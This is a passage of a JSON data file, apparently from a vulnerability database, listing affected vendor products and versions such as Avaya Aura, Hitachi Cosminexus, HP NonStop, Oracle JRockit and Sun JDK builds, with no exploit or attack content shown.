"version": "12.1.10"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "enterprise linux extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"_id": null,
"model": "nonstop server j06.09.04",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "iplanet web server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.0"
},
{
"_id": null,
"model": "ucosminexus operator",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "linux enterprise server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.2"
},
{
"_id": null,
"model": "meeting exchange sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "aura application server sip core",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0.0.52"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "java system application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.2"
},
{
"_id": null,
"model": "cosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "8.0"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "nonstop server h06.18.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.15.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.22.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.014"
},
{
"_id": null,
"model": "cosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "nonstop server j06.12.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ir",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "aura messaging",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"_id": null,
"model": "jrockit r27.6.9",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "nonstop server j06.05.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.011"
},
{
"_id": null,
"model": "nonstop server j06.08.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.09.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jrockit r27.6.3",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"_id": null,
"model": "nonstop server j06.16",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ucosminexus client for plug-in",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "java se sr6",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "nonstop server j6.0.14.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.2"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "jrockit r27.1.0",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.3"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "010"
},
{
"_id": null,
"model": "enterprise linux supplementary server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "jrockit r28.1.4",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "ucosminexus developer light",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "ucosminexus service platform messaging",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "nonstop server j06.07.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "nonstop server j06.09.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java system web server sp5",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "jrockit r28.0.0",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "meeting exchange sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "nonstop server j06.10.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "aura messaging",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"_id": null,
"model": "jrockit r27.6.6",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.06.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.012"
},
{
"_id": null,
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "nonstop server h06.24.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.4"
},
{
"_id": null,
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "jrockit r27.6.8",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.25",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java system web server sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "messaging storage server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.04"
},
{
"_id": null,
"model": "ucosminexus application server light",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "nonstop server h06.15.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java system web server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "jrockit r27.7.1",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "cosminexus studio",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "java system web server sp10",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1"
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"_id": null,
"model": "enterprise linux ws extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "java se sr9",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0"
},
{
"_id": null,
"model": "jrockit r28.1.1",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"_id": null,
"model": "hp-ux b.11.11",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "nonstop server j06.07.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "enterprise linux es extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "message networking sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux enterprise server for vmware sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "xp p9000 performance advisor",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "5.5.1"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.010"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.013"
},
{
"_id": null,
"model": "java system web server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "jrockit r27.6.4",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.08.04",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.08.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "aura system manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "messaging storage server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"_id": null,
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.015"
},
{
"_id": null,
"model": "nonstop server h06.15.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.24",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.018"
},
{
"_id": null,
"model": "cosminexus primary server base",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.019"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "nonstop server h06.16.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ucosminexus developer professional for plug-in",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "nonstop server h06.18.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.20.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.6"
},
{
"_id": null,
"model": "enterprise linux server supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "java ibm 31-bit sdk for z/os",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"_id": null,
"model": "nonstop server j06.13.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"_id": null,
"model": "nonstop server h06.23",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.3"
},
{
"_id": null,
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "nonstop server h06.19.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java se sr7",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "communication manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"_id": null,
"model": "esx",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "4.1"
},
{
"_id": null,
"model": "nonstop server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6"
},
{
"_id": null,
"model": "jrockit r28.0.1",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "call management system r",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "15.0"
},
{
"_id": null,
"model": "glassfish server ur1 po1",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"_id": null,
"model": "enterprise linux workstation supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.3"
},
{
"_id": null,
"model": "nonstop server h06.22.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"_id": null,
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"_id": null,
"model": "jrockit r28.1.3",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.2"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "weblogic server 11gr1",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.020"
},
{
"_id": null,
"model": "iplanet webserver",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"_id": null,
"model": "cosminexus studio standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "nonstop server h06.19.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"_id": null,
"model": "linux enterprise server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.03"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1"
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.6"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.7"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.05"
},
{
"_id": null,
"model": "linux enterprise sdk sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.1"
},
{
"_id": null,
"model": "nonstop server j06.11.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java se sr9-fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0"
},
{
"_id": null,
"model": "java system web server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "virtual desktop infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2"
},
{
"_id": null,
"model": "nonstop server j06.15",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"_id": null,
"model": "messaging application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "glassfish server ur1",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"_id": null,
"model": "ucosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "ucosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "nonstop server h06.21.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jrockit r27.6.7",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"_id": null,
"model": "nonstop server h06.20.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"_id": null,
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "rational synergy",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.3"
},
{
"_id": null,
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "jrockit r27.6.0",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "hp-ux b.11.31",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ucosminexus application server enterprise )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "09-80"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.2"
},
{
"_id": null,
"model": "cosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "aura experience portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"_id": null,
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "nonstop server j06.05.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java system web server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "application server 10g r3",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.3.5.0"
},
{
"_id": null,
"model": "nonstop server j06.07.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "java system application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.1"
},
{
"_id": null,
"model": "nonstop server h06.21.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "nonstop server h06.19.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux enterprise java sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"_id": null,
"model": "xp p9000 performance advisor",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.4.1"
},
{
"_id": null,
"model": "ucosminexus application server smart edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.7"
},
{
"_id": null,
"model": "nonstop server j06.11.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.26.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "cosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "aura application enablement services",
